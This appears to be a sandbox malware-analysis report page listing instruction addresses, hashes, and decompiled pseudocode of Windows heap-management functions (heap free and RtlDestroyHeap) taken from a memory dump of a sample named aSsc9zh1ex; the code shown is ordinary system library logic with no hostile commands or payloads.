                                                                                                                              0x1d754aee
                                                                                                                              0x00000000
                                                                                                                              0x1d7548d1
                                                                                                                              0x1d7548d1
                                                                                                                              0x1d7548d4
                                                                                                                              0x1d7548d7
                                                                                                                              0x1d7548d9
                                                                                                                              0x1d7548df
                                                                                                                              0x1d7548e3
                                                                                                                              0x1d7548e5
                                                                                                                              0x1d7548e8
                                                                                                                              0x1d754901
                                                                                                                              0x1d754903
                                                                                                                              0x1d754915
                                                                                                                              0x1d75491a
                                                                                                                              0x1d75491a
                                                                                                                              0x1d754903
                                                                                                                              0x1d754923
                                                                                                                              0x1d754925
                                                                                                                              0x1d75492b
                                                                                                                              0x1d75492d
                                                                                                                              0x1d754938
                                                                                                                              0x1d75493b
                                                                                                                              0x1d75493e
                                                                                                                              0x1d754940
                                                                                                                              0x1d754946
                                                                                                                              0x1d75494a
                                                                                                                              0x1d75494c
                                                                                                                              0x1d75494f
                                                                                                                              0x1d754968
                                                                                                                              0x1d75496a
                                                                                                                              0x1d75497c
                                                                                                                              0x1d754981
                                                                                                                              0x1d754981
                                                                                                                              0x1d75496a
                                                                                                                              0x1d75498a
                                                                                                                              0x1d75498c
                                                                                                                              0x1d754992
                                                                                                                              0x1d754994
                                                                                                                              0x1d75499d
                                                                                                                              0x1d7549a0
                                                                                                                              0x1d754a3a
                                                                                                                              0x1d754a3a
                                                                                                                              0x1d754a3f
                                                                                                                              0x1d754a4c
                                                                                                                              0x1d754a52
                                                                                                                              0x1d754a5d
                                                                                                                              0x1d754a5d
                                                                                                                              0x1d754a5f
                                                                                                                              0x1d754a62
                                                                                                                              0x1d754a62
                                                                                                                              0x1d754a68
                                                                                                                              0x1d754a6e
                                                                                                                              0x1d754a70
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d754a72
                                                                                                                              0x1d754a74
                                                                                                                              0x1d754a7e
                                                                                                                              0x1d754a80
                                                                                                                              0x1d754af6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d754a76
                                                                                                                              0x1d754a76
                                                                                                                              0x1d754a79
                                                                                                                              0x1d754a7b
                                                                                                                              0x00000000
                                                                                                                              0x1d754a7b
                                                                                                                              0x00000000
                                                                                                                              0x1d754a74
                                                                                                                              0x1d754a82
                                                                                                                              0x1d754a85
                                                                                                                              0x1d754aae
                                                                                                                              0x1d754ab1
                                                                                                                              0x1d754ab3
                                                                                                                              0x1d754acb
                                                                                                                              0x1d754acb
                                                                                                                              0x1d754ab5
                                                                                                                              0x1d754abc
                                                                                                                              0x1d754abc
                                                                                                                              0x1d754a87
                                                                                                                              0x1d754a87
                                                                                                                              0x1d754a8a
                                                                                                                              0x1d754a8c
                                                                                                                              0x1d754aa4
                                                                                                                              0x1d754a8e
                                                                                                                              0x1d754a8e
                                                                                                                              0x1d754a8e
                                                                                                                              0x1d754a8c
                                                                                                                              0x1d754ad1
                                                                                                                              0x1d754ad3
                                                                                                                              0x1d754ad9
                                                                                                                              0x1d754add
                                                                                                                              0x1d754adf
                                                                                                                              0x1d754adf
                                                                                                                              0x1d754adf
                                                                                                                              0x1d754ae4
                                                                                                                              0x00000000
                                                                                                                              0x1d7549a6
                                                                                                                              0x1d7549aa
                                                                                                                              0x1d7549ad
                                                                                                                              0x00000000
                                                                                                                              0x1d7549b3
                                                                                                                              0x1d7549b3
                                                                                                                              0x1d7549b6
                                                                                                                              0x1d7549ba
                                                                                                                              0x1d7549bc
                                                                                                                              0x1d7549bc
                                                                                                                              0x1d7549bc
                                                                                                                              0x1d7549c1
                                                                                                                              0x1d7549c4
                                                                                                                              0x1d7549c4
                                                                                                                              0x1d7549c6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7549c8
                                                                                                                              0x1d7549cb
                                                                                                                              0x1d7549cd
                                                                                                                              0x1d7549d3
                                                                                                                              0x1d7549d7
                                                                                                                              0x1d7549d9
                                                                                                                              0x1d7549dc
                                                                                                                              0x1d7549f5
                                                                                                                              0x1d7549f7
                                                                                                                              0x1d754a07
                                                                                                                              0x1d754a07
                                                                                                                              0x1d7549f7
                                                                                                                              0x1d754a12
                                                                                                                              0x1d754a14
                                                                                                                              0x1d754a1a
                                                                                                                              0x1d754a1c
                                                                                                                              0x1d754a28
                                                                                                                              0x1d754a2a
                                                                                                                              0x00000000
                                                                                                                              0x1d754a1e
                                                                                                                              0x1d754a1e
                                                                                                                              0x1d754a20
                                                                                                                              0x1d754a20
                                                                                                                              0x00000000
                                                                                                                              0x1d754a1c
                                                                                                                              0x1d754a2f
                                                                                                                              0x1d754a32
                                                                                                                              0x00000000
                                                                                                                              0x1d754a32
                                                                                                                              0x1d7549ad
                                                                                                                              0x1d754996
                                                                                                                              0x1d754996
                                                                                                                              0x00000000
                                                                                                                              0x1d754996
                                                                                                                              0x1d75492f
                                                                                                                              0x1d75492f
                                                                                                                              0x1d754ae7
                                                                                                                              0x1d754ae7
                                                                                                                              0x1d754ae7
                                                                                                                              0x00000000
                                                                                                                              0x1d75492d
                                                                                                                              0x1d7548a6
                                                                                                                              0x00000000
                                                                                                                              0x1d75489d
                                                                                                                              0x00000000
                                                                                                                              0x1d754892
                                                                                                                              0x1d754b15
                                                                                                                              0x1d754b15
                                                                                                                              0x1d754b18
                                                                                                                              0x1d754b18
                                                                                                                              0x1d754b1a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d754b1c
                                                                                                                              0x1d754b20
                                                                                                                              0x1d754b3c
                                                                                                                              0x1d754b40
                                                                                                                              0x1d754b22
                                                                                                                              0x1d754b22
                                                                                                                              0x1d754b25
                                                                                                                              0x1d754b28
                                                                                                                              0x1d754b2b
                                                                                                                              0x1d754b2d
                                                                                                                              0x1d754b2d
                                                                                                                              0x1d754b30
                                                                                                                              0x1d754b30
                                                                                                                              0x1d754b33
                                                                                                                              0x1d754b37
                                                                                                                              0x1d754b37
                                                                                                                              0x1d754b47
                                                                                                                              0x1d754b49
                                                                                                                              0x1d754b4b
                                                                                                                              0x1d754b4d
                                                                                                                              0x00000000
                                                                                                                              0x1d754b4d
                                                                                                                              0x00000000
                                                                                                                              0x1d754b49
                                                                                                                              0x1d754b55
                                                                                                                              0x1d754b58
                                                                                                                              0x1d754b5b
                                                                                                                              0x1d754b5e
                                                                                                                              0x1d754b60
                                                                                                                              0x1d754b62
                                                                                                                              0x1d754b76
                                                                                                                              0x1d754b76
                                                                                                                              0x1d754b78
                                                                                                                              0x1d754b7b
                                                                                                                              0x1d754b64
                                                                                                                              0x1d754b64
                                                                                                                              0x1d754b66
                                                                                                                              0x1d754b69
                                                                                                                              0x1d754b6b
                                                                                                                              0x1d754b6b
                                                                                                                              0x1d754b83
                                                                                                                              0x1d754b86
                                                                                                                              0x1d754b8c
                                                                                                                              0x1d754b8f
                                                                                                                              0x1d754b91
                                                                                                                              0x1d754b97
                                                                                                                              0x1d754ba0
                                                                                                                              0x1d754ba0
                                                                                                                              0x1d754ba3
                                                                                                                              0x1d754ba5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d754ba7
                                                                                                                              0x1d754ba9
                                                                                                                              0x1d754bab
                                                                                                                              0x1d754cad
                                                                                                                              0x1d754caf
                                                                                                                              0x00000000
                                                                                                                              0x1d754bb1
                                                                                                                              0x1d754bb1
                                                                                                                              0x1d754bb1
                                                                                                                              0x00000000
                                                                                                                              0x1d754bab
                                                                                                                              0x1d754bb4
                                                                                                                              0x1d754bbd
                                                                                                                              0x1d754bc2
                                                                                                                              0x1d754bc5
                                                                                                                              0x1d754bc8
                                                                                                                              0x1d754bcc
                                                                                                                              0x1d754bcf
                                                                                                                              0x1d754bd1
                                                                                                                              0x1d754bd1
                                                                                                                              0x1d754bd3
                                                                                                                              0x1d754bd9
                                                                                                                              0x1d754be5
                                                                                                                              0x1d754bec
                                                                                                                              0x1d754bee
                                                                                                                              0x1d754bf1
                                                                                                                              0x1d754bf3
                                                                                                                              0x1d754bf3
                                                                                                                              0x1d754bf3
                                                                                                                              0x1d754bf3
                                                                                                                              0x1d754bf6
                                                                                                                              0x1d754bf9
                                                                                                                              0x1d754bfb
                                                                                                                              0x1d754c5d
                                                                                                                              0x1d754c5d
                                                                                                                              0x1d754c60
                                                                                                                              0x1d754c66
                                                                                                                              0x1d754c69
                                                                                                                              0x1d754bfd
                                                                                                                              0x1d754bfd
                                                                                                                              0x1d754c00
                                                                                                                              0x1d754c06
                                                                                                                              0x1d754c0a
                                                                                                                              0x1d754c0c
                                                                                                                              0x1d754c0f
                                                                                                                              0x1d754c28
                                                                                                                              0x1d754c2a
                                                                                                                              0x1d754c3d
                                                                                                                              0x1d754c42
                                                                                                                              0x1d754c42
                                                                                                                              0x1d754c45
                                                                                                                              0x1d754c45
                                                                                                                              0x1d754c4e
                                                                                                                              0x1d754c50
                                                                                                                              0x1d754c56
                                                                                                                              0x1d754c58
                                                                                                                              0x1d754c5b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d754c5b
                                                                                                                              0x1d754c6c
                                                                                                                              0x1d754c6e
                                                                                                                              0x1d754c72
                                                                                                                              0x1d754c78
                                                                                                                              0x1d754c80
                                                                                                                              0x1d754c83
                                                                                                                              0x1d754c88
                                                                                                                              0x1d754c8b
                                                                                                                              0x1d754c8b
                                                                                                                              0x1d754c8b
                                                                                                                              0x1d754c8b
                                                                                                                              0x1d754c6e
                                                                                                                              0x1d754b91
                                                                                                                              0x1d754c8e
                                                                                                                              0x1d754c92
                                                                                                                              0x1d754ca0
                                                                                                                              0x1d754ca6
                                                                                                                              0x1d754ca6
                                                                                                                              0x1d754c92
                                                                                                                              0x1d754dbd
                                                                                                                              0x1d754dc0
                                                                                                                              0x1d754dc5
                                                                                                                              0x1d754dc7
                                                                                                                              0x1d754dcb
                                                                                                                              0x1d754dd0
                                                                                                                              0x1d754dda
                                                                                                                              0x1d754ddd
                                                                                                                              0x1d754ddf
                                                                                                                              0x1d754de0
                                                                                                                              0x1d754de4
                                                                                                                              0x1d754de4
                                                                                                                              0x1d754ddd
                                                                                                                              0x1d754dec
                                                                                                                              0x1d754def
                                                                                                                              0x1d754df5
                                                                                                                              0x1d754df8
                                                                                                                              0x1d754dfc
                                                                                                                              0x1d754e05
                                                                                                                              0x1d754e0b
                                                                                                                              0x1d754e0b
                                                                                                                              0x1d754e0b
                                                                                                                              0x1d754e11
                                                                                                                              0x1d754e17
                                                                                                                              0x1d754e1b
                                                                                                                              0x1d754e22
                                                                                                                              0x1d754e2c
                                                                                                                              0x1d754e2c
                                                                                                                              0x00000000
                                                                                                                              0x1d754e22
                                                                                                                              0x1d75482e
                                                                                                                              0x1d75482e
                                                                                                                              0x1d754834
                                                                                                                              0x00000000
                                                                                                                              0x1d754836
                                                                                                                              0x1d75483a
                                                                                                                              0x1d75483e
                                                                                                                              0x00000000
                                                                                                                              0x1d754840
                                                                                                                              0x1d754843
                                                                                                                              0x1d754847
                                                                                                                              0x1d75484e
                                                                                                                              0x00000000
                                                                                                                              0x1d75484e
                                                                                                                              0x1d75483e
                                                                                                                              0x1d754834
                                                                                                                              0x1d7547f0
                                                                                                                              0x1d7547f5
                                                                                                                              0x1d7547f8
                                                                                                                              0x00000000
                                                                                                                              0x1d7547fa
                                                                                                                              0x1d7547fd
                                                                                                                              0x1d754801
                                                                                                                              0x1d754e30
                                                                                                                              0x1d754e30
                                                                                                                              0x1d754e30
                                                                                                                              0x1d7547f8
                                                                                                                              0x1d754e33
                                                                                                                              0x1d754e35
                                                                                                                              0x1d754e35
                                                                                                                              0x1d753dc7
                                                                                                                              0x1d753dc7
                                                                                                                              0x1d753dcd
                                                                                                                              0x1d753dd7
                                                                                                                              0x1d753ddc
                                                                                                                              0x1d753e00
                                                                                                                              0x1d753e03
                                                                                                                              0x1d753e17
                                                                                                                              0x1d753e1e
                                                                                                                              0x1d753e25
                                                                                                                              0x1d753e6f
                                                                                                                              0x1d753e79
                                                                                                                              0x1d753e7b
                                                                                                                              0x00000000
                                                                                                                              0x1d753e27
                                                                                                                              0x1d753e27
                                                                                                                              0x1d753e31
                                                                                                                              0x1d753e3b
                                                                                                                              0x1d753e42
                                                                                                                              0x1d753e52
                                                                                                                              0x1d753e55
                                                                                                                              0x1d753e5f
                                                                                                                              0x1d753e61
                                                                                                                              0x1d75501b
                                                                                                                              0x1d75501b
                                                                                                                              0x1d75501b
                                                                                                                              0x1d753e05
                                                                                                                              0x1d753e05
                                                                                                                              0x1d753e08
                                                                                                                              0x1d753e0f
                                                                                                                              0x00000000
                                                                                                                              0x1d753e0f
                                                                                                                              0x1d753dde
                                                                                                                              0x1d753de1
                                                                                                                              0x1d753de4
                                                                                                                              0x1d753deb
                                                                                                                              0x1d753df2
                                                                                                                              0x1d753e80
                                                                                                                              0x1d753e80
                                                                                                                              0x1d753e84
                                                                                                                              0x1d753e88
                                                                                                                              0x1d753e8b
                                                                                                                              0x1d753e8f
                                                                                                                              0x1d753e94
                                                                                                                              0x1d753e9e
                                                                                                                              0x1d753ea1
                                                                                                                              0x1d753ea3
                                                                                                                              0x1d753ea8
                                                                                                                              0x1d753ea8
                                                                                                                              0x1d753ea1
                                                                                                                              0x1d753ead
                                                                                                                              0x1d753eb0
                                                                                                                              0x1d753eb6
                                                                                                                              0x1d753eb6
                                                                                                                              0x1d753eb9
                                                                                                                              0x1d753ebb
                                                                                                                              0x1d753ebd
                                                                                                                              0x1d753ec3
                                                                                                                              0x1d753ec5
                                                                                                                              0x1d753ec5
                                                                                                                              0x1d753ec7
                                                                                                                              0x1d753ec9
                                                                                                                              0x1d753ecb
                                                                                                                              0x1d753f03
                                                                                                                              0x00000000
                                                                                                                              0x1d753ecd
                                                                                                                              0x1d753ecd
                                                                                                                              0x1d753ed0
                                                                                                                              0x1d753ed0
                                                                                                                              0x00000000
                                                                                                                              0x1d753ecb
                                                                                                                              0x1d753ed6
                                                                                                                              0x1d753ed8
                                                                                                                              0x1d753ef7
                                                                                                                              0x1d753ef7
                                                                                                                              0x1d753eda
                                                                                                                              0x1d753eda
                                                                                                                              0x1d753edc
                                                                                                                              0x00000000
                                                                                                                              0x1d753ede
                                                                                                                              0x1d753ede
                                                                                                                              0x1d753ee1
                                                                                                                              0x1d753ee5
                                                                                                                              0x1d753ee7
                                                                                                                              0x1d753ee7
                                                                                                                              0x1d753ee7
                                                                                                                              0x1d753eef
                                                                                                                              0x1d753eef
                                                                                                                              0x1d753edc
                                                                                                                              0x00000000
                                                                                                                              0x1d753ed8
                                                                                                                              0x1d753ddc
                                                                                                                              0x1d75501e
                                                                                                                              0x1d755025
                                                                                                                              0x1d755033
                                                                                                                              0x1d755041
                                                                                                                              0x1d753d15
                                                                                                                              0x1d753d15
                                                                                                                              0x1d753d19
                                                                                                                              0x1d753d1e
                                                                                                                              0x1d753d24
                                                                                                                              0x00000000
                                                                                                                              0x1d753d26
                                                                                                                              0x1d753d26
                                                                                                                              0x1d753d2c
                                                                                                                              0x00000000
                                                                                                                              0x1d753d2e
                                                                                                                              0x1d753d31
                                                                                                                              0x1d753d39
                                                                                                                              0x1d753d47
                                                                                                                              0x1d753d47
                                                                                                                              0x1d753d2c
                                                                                                                              0x1d753d24
                                                                                                                              0x1d753cde
                                                                                                                              0x1d753cec
                                                                                                                              0x1d753cf6
                                                                                                                              0x1d753d04
                                                                                                                              0x1d753d04

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                              • API String ID: 0-3178619729
                                                                                                                              • Opcode ID: 6f1742230a15c5b06b8147861d279ef8cd09594433c98d158c5938ba91b22f55
                                                                                                                              • Instruction ID: e633c8a6d66ec0af0ea5bfd1fd5f61de9084549162a3696bb7655e216c8d516e
                                                                                                                              • Opcode Fuzzy Hash: 6f1742230a15c5b06b8147861d279ef8cd09594433c98d158c5938ba91b22f55
                                                                                                                              • Instruction Fuzzy Hash: AEE2D074B00255DFDB15CF68C880BA9BBF1FF49328F14819AE849AB395D735A841CF92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 73%
                                                                                                                              			E1D73F5C7(void* __ecx, void* __edx) {
				char _v36;
				char _v40;
				void* _v44;
				void* _v48;
				void* _v60;
				void* _v64;
				void* _v72;
				void* _v76;
				void* __ebx;
				intOrPtr _t63;
				void* _t66;
				signed int _t73;
				void* _t77;
				void* _t78;
				signed char* _t81;
				intOrPtr _t82;
				signed char* _t87;
				intOrPtr _t88;
				void* _t89;
				signed char* _t92;
				signed char _t98;
				void* _t110;
				void* _t130;
				void* _t136;
				signed int _t138;
				void* _t140;

				_t140 = (_t138 & 0xfffffff8) - 0x24;
				_t110 = __edx;
				_t136 = __ecx;
				E1D73F858(__edx,  &_v36,  &_v40);
				if(E1D7768EA( *((intOrPtr*)(_t136 + 0x1f8)) -  *((intOrPtr*)(_t136 + 0x244)), _t136, _t136 + 0xd4) == 0) {
					_t128 = 0xc000012d;
					L17:
					_t63 =  *[fs:0x30];
					 *((intOrPtr*)(_t136 + 0x228)) =  *((intOrPtr*)(_t136 + 0x228)) + 1;
					__eflags =  *(_t63 + 0xc);
					if( *(_t63 + 0xc) == 0) {
						_push("HEAP: ");
						E1D73B910();
					} else {
						E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_v40);
					_push(_v36);
					_push(_t136);
					E1D73B910("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t128);
					_t66 = 0;
					L15:
					return _t66;
				}
				if(( *(_t136 + 0x40) & 0x00040000) != 0) {
					_t130 = 0x40;
					_push(0);
					_push(0x1c);
					_push(_t140 + 0x1c);
					_push(3);
					_push(_t136);
					_push(0xffffffff);
					_t73 = E1D782BE0();
					__eflags = _t73;
					if(_t73 < 0) {
						L22:
						E1D805FED(0, _t136, 1,  *((intOrPtr*)(_t140 + 0x20)), 0, 0);
						goto L2;
					}
					__eflags =  *(_t140 + 0x18) & 0x00000060;
					if(( *(_t140 + 0x18) & 0x00000060) == 0) {
						goto L22;
					}
					__eflags =  *((intOrPtr*)(_t140 + 0x14)) - _t136;
					if( *((intOrPtr*)(_t140 + 0x14)) == _t136) {
						L3:
						_push(_t130);
						_push(0x1000);
						_push( &_v40);
						_push(0);
						_push( &_v36);
						_push(0xffffffff);
						_t77 = E1D782B10();
						_t128 = _t77;
						if(_t77 < 0) {
							goto L17;
						}
						_t78 = E1D753C40();
						_t131 = 0x7ffe0380;
						if(_t78 != 0) {
							_t81 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t81 = 0x7ffe0380;
						}
						if( *_t81 != 0) {
							_t82 =  *[fs:0x30];
							__eflags =  *(_t82 + 0x240) & 0x00000001;
							if(( *(_t82 + 0x240) & 0x00000001) != 0) {
								E1D7FEFD3(_t110, _t136, _v36, _v40, 8);
							}
						}
						 *((intOrPtr*)(_t136 + 0x240)) =  *((intOrPtr*)(_t136 + 0x240)) - 1;
						 *((intOrPtr*)(_t136 + 0x244)) =  *((intOrPtr*)(_t136 + 0x244)) - _v40;
						if(E1D753C40() != 0) {
							_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t87 = _t131;
						}
						if( *_t87 != 0) {
							_t88 =  *[fs:0x30];
							__eflags =  *(_t88 + 0x240) & 0x00000001;
							if(( *(_t88 + 0x240) & 0x00000001) != 0) {
								__eflags = E1D753C40();
								if(__eflags != 0) {
									_t131 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								E1D7FF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t131 & 0x000000ff);
							}
						}
						_t89 = E1D753C40();
						_t132 = 0x7ffe038a;
						if(_t89 != 0) {
							_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t92 = 0x7ffe038a;
						}
						if( *_t92 != 0) {
							__eflags = E1D753C40();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							}
							E1D7FF1C3(_t110, _t136, _v36, __eflags, _v40,  *(_t136 + 0x74) << 3,  *_t132 & 0x000000ff);
						}
						 *((intOrPtr*)(_t136 + 0x21c)) =  *((intOrPtr*)(_t136 + 0x21c)) + 1;
						_t98 =  *(_t110 + 2);
						if((_t98 & 0x00000004) != 0) {
							E1D798140(_v36, _v40, 0xfeeefeee);
							_t98 =  *(_t110 + 2);
						}
						 *(_t110 + 2) = _t98 & 0x00000017;
						_t66 = 1;
						goto L15;
					}
					goto L22;
				}
				L2:
				_t130 = 4;
				goto L3;
			}





























                                                                                                                              0x1d73f5cf
                                                                                                                              0x1d73f5d9
                                                                                                                              0x1d73f5e0
                                                                                                                              0x1d73f5e3
                                                                                                                              0x1d73f607
                                                                                                                              0x1d79e162
                                                                                                                              0x1d79e167
                                                                                                                              0x1d79e167
                                                                                                                              0x1d79e16d
                                                                                                                              0x1d79e173
                                                                                                                              0x1d79e177
                                                                                                                              0x1d79e2dd
                                                                                                                              0x1d79e2e2
                                                                                                                              0x1d79e17d
                                                                                                                              0x1d79e192
                                                                                                                              0x1d79e197
                                                                                                                              0x1d79e2e8
                                                                                                                              0x1d79e2ec
                                                                                                                              0x1d79e2f0
                                                                                                                              0x1d79e2f7
                                                                                                                              0x1d79e2ff
                                                                                                                              0x1d73f6ba
                                                                                                                              0x1d73f6c0
                                                                                                                              0x1d73f6c0
                                                                                                                              0x1d73f614
                                                                                                                              0x1d79e19f
                                                                                                                              0x1d79e1a0
                                                                                                                              0x1d79e1a2
                                                                                                                              0x1d79e1a8
                                                                                                                              0x1d79e1a9
                                                                                                                              0x1d79e1ab
                                                                                                                              0x1d79e1ac
                                                                                                                              0x1d79e1ae
                                                                                                                              0x1d79e1b3
                                                                                                                              0x1d79e1b5
                                                                                                                              0x1d79e1c8
                                                                                                                              0x1d79e1d6
                                                                                                                              0x00000000
                                                                                                                              0x1d79e1d6
                                                                                                                              0x1d79e1b7
                                                                                                                              0x1d79e1bc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d79e1be
                                                                                                                              0x1d79e1c2
                                                                                                                              0x1d73f61d
                                                                                                                              0x1d73f61d
                                                                                                                              0x1d73f61e
                                                                                                                              0x1d73f627
                                                                                                                              0x1d73f628
                                                                                                                              0x1d73f62e
                                                                                                                              0x1d73f62f
                                                                                                                              0x1d73f631
                                                                                                                              0x1d73f636
                                                                                                                              0x1d73f63a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d73f640
                                                                                                                              0x1d73f645
                                                                                                                              0x1d73f64c
                                                                                                                              0x1d79e1e9
                                                                                                                              0x1d73f652
                                                                                                                              0x1d73f652
                                                                                                                              0x1d73f652
                                                                                                                              0x1d73f657
                                                                                                                              0x1d79e1f3
                                                                                                                              0x1d79e1f9
                                                                                                                              0x1d79e200
                                                                                                                              0x1d79e212
                                                                                                                              0x1d79e212
                                                                                                                              0x1d79e200
                                                                                                                              0x1d73f661
                                                                                                                              0x1d73f667
                                                                                                                              0x1d73f674
                                                                                                                              0x1d79e225
                                                                                                                              0x1d73f67a
                                                                                                                              0x1d73f67a
                                                                                                                              0x1d73f67a
                                                                                                                              0x1d73f67f
                                                                                                                              0x1d79e22f
                                                                                                                              0x1d79e235
                                                                                                                              0x1d79e23c
                                                                                                                              0x1d79e247
                                                                                                                              0x1d79e249
                                                                                                                              0x1d79e254
                                                                                                                              0x1d79e254
                                                                                                                              0x1d79e254
                                                                                                                              0x1d79e26f
                                                                                                                              0x1d79e26f
                                                                                                                              0x1d79e23c
                                                                                                                              0x1d73f685
                                                                                                                              0x1d73f68a
                                                                                                                              0x1d73f691
                                                                                                                              0x1d79e282
                                                                                                                              0x1d73f697
                                                                                                                              0x1d73f697
                                                                                                                              0x1d73f697
                                                                                                                              0x1d73f69c
                                                                                                                              0x1d79e291
                                                                                                                              0x1d79e293
                                                                                                                              0x1d79e29e
                                                                                                                              0x1d79e29e
                                                                                                                              0x1d79e29e
                                                                                                                              0x1d79e2b9
                                                                                                                              0x1d79e2b9
                                                                                                                              0x1d73f6a2
                                                                                                                              0x1d73f6a8
                                                                                                                              0x1d73f6ad
                                                                                                                              0x1d79e2d0
                                                                                                                              0x1d79e2d5
                                                                                                                              0x1d79e2d5
                                                                                                                              0x1d73f6b5
                                                                                                                              0x1d73f6b8
                                                                                                                              0x00000000
                                                                                                                              0x1d73f6b8
                                                                                                                              0x00000000
                                                                                                                              0x1d79e1c2
                                                                                                                              0x1d73f61a
                                                                                                                              0x1d73f61c
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                              • API String ID: 2994545307-2586055223
                                                                                                                              • Opcode ID: 85f0634d092bb17ab11488f829f4e678cdc6120e4e4fc398f34384a27e2acf69
                                                                                                                              • Instruction ID: 9ccdb22c44996ac46f5a4af95398be9202fe2c06c0a2d104b7b6adbb2770514c
                                                                                                                              • Opcode Fuzzy Hash: 85f0634d092bb17ab11488f829f4e678cdc6120e4e4fc398f34384a27e2acf69
                                                                                                                              • Instruction Fuzzy Hash: A361F777249681EFD315CB54E848F67B7E9FF84B70F05085AE6948B2A2D634E800C763
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EF85F Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 67%
                                                                                                                              			E1D7EF85F(signed int* __ecx) {
				char _v8;
				void* _t11;
				signed int* _t34;

				_push(__ecx);
				_t34 = __ecx;
				if(__ecx !=  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
					if(E1D737662("RtlDestroyHeap") == 0 || E1D7F0835(__ecx, 0) == 0) {
						L5:
						_t11 = 0;
						goto L6;
					} else {
						_t32 = __ecx + 0x80;
						 *((intOrPtr*)(__ecx + 0x60)) = 0;
						if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
							_v8 = 0;
							E1D73FABA(_t32,  &_v8, 0x8000);
						}
						_t11 = 1;
						L6:
						return _t11;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push("HEAP: ");
					E1D73B910();
				} else {
					E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				E1D73B910("May not destroy the process heap at %p\n", _t34);
				goto L5;
			}






                                                                                                                              0x1d7ef864
                                                                                                                              0x1d7ef86c
                                                                                                                              0x1d7ef871
                                                                                                                              0x1d7ef8c5
                                                                                                                              0x1d7ef8b4
                                                                                                                              0x1d7ef8b4
                                                                                                                              0x00000000
                                                                                                                              0x1d7ef8d4
                                                                                                                              0x1d7ef8d6
                                                                                                                              0x1d7ef8dc
                                                                                                                              0x1d7ef8e1
                                                                                                                              0x1d7ef8e3
                                                                                                                              0x1d7ef8ef
                                                                                                                              0x1d7ef8ef
                                                                                                                              0x1d7ef8f4
                                                                                                                              0x1d7ef8b6
                                                                                                                              0x1d7ef8b8
                                                                                                                              0x1d7ef8b8
                                                                                                                              0x1d7ef8c5
                                                                                                                              0x1d7ef87d
                                                                                                                              0x1d7ef89c
                                                                                                                              0x1d7ef8a1
                                                                                                                              0x1d7ef87f
                                                                                                                              0x1d7ef894
                                                                                                                              0x1d7ef899
                                                                                                                              0x1d7ef8ad
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
